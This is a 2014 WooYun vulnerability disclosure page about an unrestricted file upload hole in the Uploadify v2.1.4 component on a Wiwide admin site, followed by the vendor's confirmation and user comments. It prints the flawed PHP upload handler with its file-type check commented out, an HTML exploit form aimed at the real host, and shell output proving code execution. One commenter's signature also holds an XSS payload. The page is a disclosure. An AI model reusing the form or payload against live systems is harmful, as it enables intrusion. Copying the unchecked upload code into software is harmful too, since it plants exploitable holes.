当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088423

漏洞标题:迈外迪某后台使用第三方组件存在上传漏洞

相关厂商:迈外迪

漏洞作者: 猪猪侠

提交时间:2014-12-24 13:18

修复时间:2015-02-07 13:20

公开时间:2015-02-07 13:20

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-24: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-07: 细节向公众公开

简要描述:

迈外迪某后台使用第三方组件存在上传漏洞

详细说明:

http://widash.wiwide.com/uploadify/scripts/_notes/dwsync.xml


存在uploadify上传组件,有用到uploadify的程序都有这个上传问题

<?php
/*
Uploadify v2.1.4
Release Date: November 8, 2010
Copyright (c) 2010 Ronnie Garcia, Travis Nickels
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
echo $tempFile;
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

// $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
// $fileTypes = str_replace(';','|',$fileTypes);
// $typesArray = split('\|',$fileTypes);
// $fileParts = pathinfo($_FILES['Filedata']['name']);

// if (in_array($fileParts['extension'],$typesArray)) {
// Uncomment the following line if you want to make the directory if it doesn't exist
// mkdir(str_replace('//','/',$targetPath), 0755, true);

move_uploaded_file($tempFile,$targetFile);
echo $targetFile;
echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
// } else {
// echo 'Invalid file type.';
// }
}
?>


漏洞利用:上传文件到网站DOCUMENT_ROOT目录下

<html>
<body>
<form action="http://widash.wiwide.com/uploadify/scripts/uploadify.php" method="post" enctype="multipart/form-data">
<input name="Filedata" type="file" />
<input name='folder' type='text' value="/">
<input name="sub" type="submit" value="upload" />
</form>
</body>
</html>

漏洞证明:

$whoami
www-data
$pwd
/home/wiwide/20141030/src/www

修复方案:

尽量不要使用第三方组件,还被人扫描到

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-12-26 16:00

厂商回复:

问题已经确认,多谢白帽子的反馈!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-24 13:21 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    前排留名

  2. 2014-12-24 13:27 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    人家都说轻点了....修不过来了..

  3. 2014-12-24 14:12 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @猪猪侠 猪哥还差第三弹呢,哈哈

  4. 2014-12-24 14:30 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    疼。轻点

  5. 2014-12-24 14:31 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    不鸣则已,一鸣惊人

  6. 2014-12-24 15:21 | azuer ( 普通白帽子 | Rank:127 漏洞数:30 )

    亲 润度不够慢点!!

  7. 2014-12-24 17:37 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)

    难道是wordpress插件?

  8. 2014-12-24 20:10 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @猪猪侠,人家肚子好痛了, 姿势一定要选对。

  9. 2014-12-25 01:28 | 看什麼看 ( 路人 | Rank:16 漏洞数:4 | 知有飄零,畢竟飄零,便是飄零也感卿)

    @猪猪侠 我很好奇,这破公司才66个员工,猪哥搞他为什么呢?

  10. 2014-12-25 08:40 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    有礼物

  11. 2014-12-25 09:38 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    一发接一发

  12. 2014-12-25 12:24 | 看什麼看 ( 路人 | Rank:16 漏洞数:4 | 知有飄零,畢竟飄零,便是飄零也感卿)

    @茜茜公主 根据我看到的资料,基本上是小白公司~~